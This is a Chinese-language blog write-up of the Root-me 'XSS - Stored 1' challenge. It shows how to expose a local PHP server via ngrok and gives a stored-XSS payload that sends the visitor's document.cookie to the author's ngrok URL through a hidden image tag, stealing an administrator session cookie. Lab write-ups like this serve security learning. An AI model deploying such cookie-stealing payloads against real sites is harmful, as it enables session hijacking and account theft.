个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

Root-me网址:

https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1

题目描述

Steal the administrator session cookie and use it to validate this chall.
窃取管理员会话cookie并使用它来验证这个挑战

这是一个存储型xss的题目,目的是获得管理员的cookie。

这里应该可以用xsspt.com(公共xss平台)获取管理员cookie。

我没有这样做,我get了一个新知识。

ngrok

这个工具我也不熟,下面如果有不对的地方,请斧正

ngrok应该利用了内网转发的功能。

先在https://dashboard.ngrok.com/signup注册一个账号

登录之后,如图

一共分四步:写的很详细:

  1. 下载对应系统的安装包
  2. 解压安装包
  3. 使用./ngrop authtoken <your token>命令连接你的账号
  4. 查看帮助信息

首先我们使用以下命令在kali上搭建一个简易的服务器

php -S localhost:9999


然后你先执行第三步的命令

./ngrop authtoken <your token>

然后再执行下条命令

./ngrok http 9999


红框中的网址即你外网的地址,这里应该是将这个地址映射到了kali本机的9999端口。
所以我们(在外网)访问这个地址就可以访问内网的kali了

有了url地址,开始做题了

构造payload:

<script>document.write('<img src="http://a76086d7.ngrok.io?cmd='+document.cookie+'" width=0 height=0 border=0 />');</script>


获取到了我自己的cookie


几分钟后获得管理员cookie。cookie即flag。

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

[Root-me]XSS - Stored 1相关推荐

  1. 【Kali渗透全方位实战】利用Beef进行XSS会话劫持(XSS Stored)

    文章目录 1 会话劫持 2 kali中beef的使用 3 开始渗透 2.1 修改dvwa xss stored等级为low 2.2 script 标签 2.3 过程演示 2.4 会话劫持 2.5 换一 ...

  2. DVWA通关--存储型XSS(XSS (Stored))

    目录 LOW 通关步骤 源码分析 MEDIUM 通关步骤 源码分析 HIGH 通关步骤 源码分析 IMPOSSIBLE 源码分析 存储型XSS也叫持久型XSS,从名字就知道特征是攻击代码会被存储在数据 ...

  3. 跨站脚本(XSS)攻击

    什么是XSS 全称:Cross Site Script(跨站脚本) 为了与层叠样式表css区分,将跨站脚本简写为XSS 危害:盗取用户信息.钓鱼.制造蠕虫等. 概念 概念:黑客通过"HTML ...

  4. xss漏洞利用方式总结

    目录 搭建XSS平台 窃取cookie 抓取屏幕截图 重定向 植入广告 恶意链接 获取键盘记录 网页钓鱼 网页挂马 搭建XSS平台 首先,我们需要一个XSS平台,自己搭建一个还是使用在线的都可以,本人 ...

  5. XSS注入(1)-两个简单测试理解反射型xss注入和存储型xss注入

    XSS注入(1)-两个例子理解反射型xss注入和存储型xss注入 XSS全称 Cross Site Script,为使与css语言重名,所以我们将其称为xss跨站脚本攻击.它指的是恶意攻击者往Web页 ...

  6. DVWA1.9平台XSS小结

    LOW级别就不写了...... 直接上中高级别(结合源码更好理解) 1.XSS Reflected(Medium) 从源码中可以清楚的看到,输入的<script>标签被过滤掉了,看清了,只 ...

  7. DVWA系列之21 存储型XSS分析与利用

    存储型跨站可以将XSS语句直接写入到数据库中,因而相比反射型跨站的利用价值要更大. 在DVWA中选择XSS stored,这里提供了一个类型留言本的页面. 我们首先查看low级别的代码,这里提供了$m ...

  8. 怎样利用超图客户端打点_渗透测试——XSS利用工具BeEF攻击演示

    跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私.钓鱼欺骗.窃取密码.传播恶意代码等攻击.XSS攻击使用到的技术主要为HTML和Javasc ...

  9. Cross-Site Scripting(XSS)的类型

    本文源自: https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting 在原文理解上翻译为中文. 背景 本文描述多种不同类型的XSS攻击 ...

最新文章

  1. 计算机反面的考研专业,2018计算机考研:历年准考证打印常见七大问题
  2. BZOJ4921「Lydsy1706月赛」互质序列
  3. nginx虚拟目录实现两个后台使用
  4. 【转】OWIN是什么?
  5. 怎样在matlab q-q图上读出斜率,Q分解法潮流计算matlab小程序
  6. ubuntu 文件权限命令详解使用格式和方法
  7. 如何使用openssl生成RSA公钥和私钥对
  8. Android studio : 模拟器 真机 运行失败(mac电脑)
  9. HiveSQL和普通SQL的区别
  10. 超级好用的高颜值终端工具---Tabby
  11. 【视角】限贷传闻横扫楼市 专家看空房地产业
  12. IPFS-Cluster 集群安装与验证测试
  13. 感恩2020,期待2021
  14. 前端工程师必备:前端的模块化
  15. 算法24c语言,EEPROM(AT24C16)页写算法
  16. 如何制作自己的网页java_怎样制作自己的购物网站页面?
  17. 收藏本站和设为主页代码(HTML)
  18. Web前端开发工程师必备技术列表
  19. C# 抓图服务的实现
  20. 《炬丰科技-半导体工艺》 组合式 CMP 和晶片清洗装置方法

热门文章

  1. SQL 2017启动出现Cannot find one or more components.Please reinstall the application
  2. hive动态分区,分区数据的几种插入方式,hive常用优化
  3. 编写的Matlab程序在运行一段时间后速度会变慢
  4. RZ、NRZ、NRZ1、曼彻斯特编码
  5. 时间日期格式转换大全
  6. setsockopt()函数
  7. 安卓移动应用开发考题_Android移动应用开发习题答案
  8. 英:各种符号的英文读法
  9. 华为将设研发机构在日本“进军物联网”
  10. 一个普通程序员的财务自由之路